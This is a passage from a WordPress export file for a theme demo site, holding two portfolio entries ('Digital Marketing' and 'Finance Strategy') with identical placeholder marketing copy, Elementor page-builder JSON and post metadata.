							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/</link>
		<pubDate>Fri, 11 Sep 2020 07:16:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=837</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>August 14, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>837</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:16:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:16:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[838]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[839]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3be3337c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"5befbf60","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ce70032","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3f822f27","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"68851ebc","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"250ea23d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"71c341e4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6542827e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"371f6bc3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1eb0ca9d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"71f04c6a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3d3344ee","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"832149d","elType":"widget","settings":{"editor":"<p>August 14, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5342643c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f721437","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2f3d08dd","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"6b706da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63060966","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75e4e9b8","elType":"section","settings":[],"elements":[{"id":"6bda05f8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"52f0b92f","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"54d9052f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3b65fe94","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7545e3c5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"605dfd7a","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2518391b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"633f728b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4070ca87","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1792de","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7cf09702","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"27507c6a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6c19f0d0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4db11d58","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4723e5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7844df75","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d819e34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"414945e5","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"58ded439","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3c1686f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"77c59310","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5a688754","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f83c9f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6eea0e82","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=842</guid>
		<description></description>
		<content:encoded><![CDATA[Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.
<h6>Client:</h6>
OceanThemes
<h6>Website:</h6>
oceanthemes.net
<h6>Date:</h6>
November 22, 2020
<h6>Category:</h6>
Marketing/Finance

<img src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" sizes="(max-width: 1174px) 100vw, 1174px" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" alt="" width="1174" height="620" />
<h5>01. Сhallenge</h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.
<ul>
 	<li>the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
</ul>
<h5>02. Solutions</h5>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
45
<h6>corporate management</h6>
<h5>03. Results</h5>
A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.

We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.

<img src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" sizes="(max-width: 606px) 100vw, 606px" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" alt="" width="606" height="342" />
<a target="_blank" rel="noopener noreferrer">
Twitter
</a>
<a target="_blank" rel="noopener noreferrer">
Facebook-f
</a>
<a target="_blank" rel="noopener noreferrer">
Google-plus-g
</a>
<a target="_blank" rel="noopener noreferrer">
Pinterest-p
</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>842</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
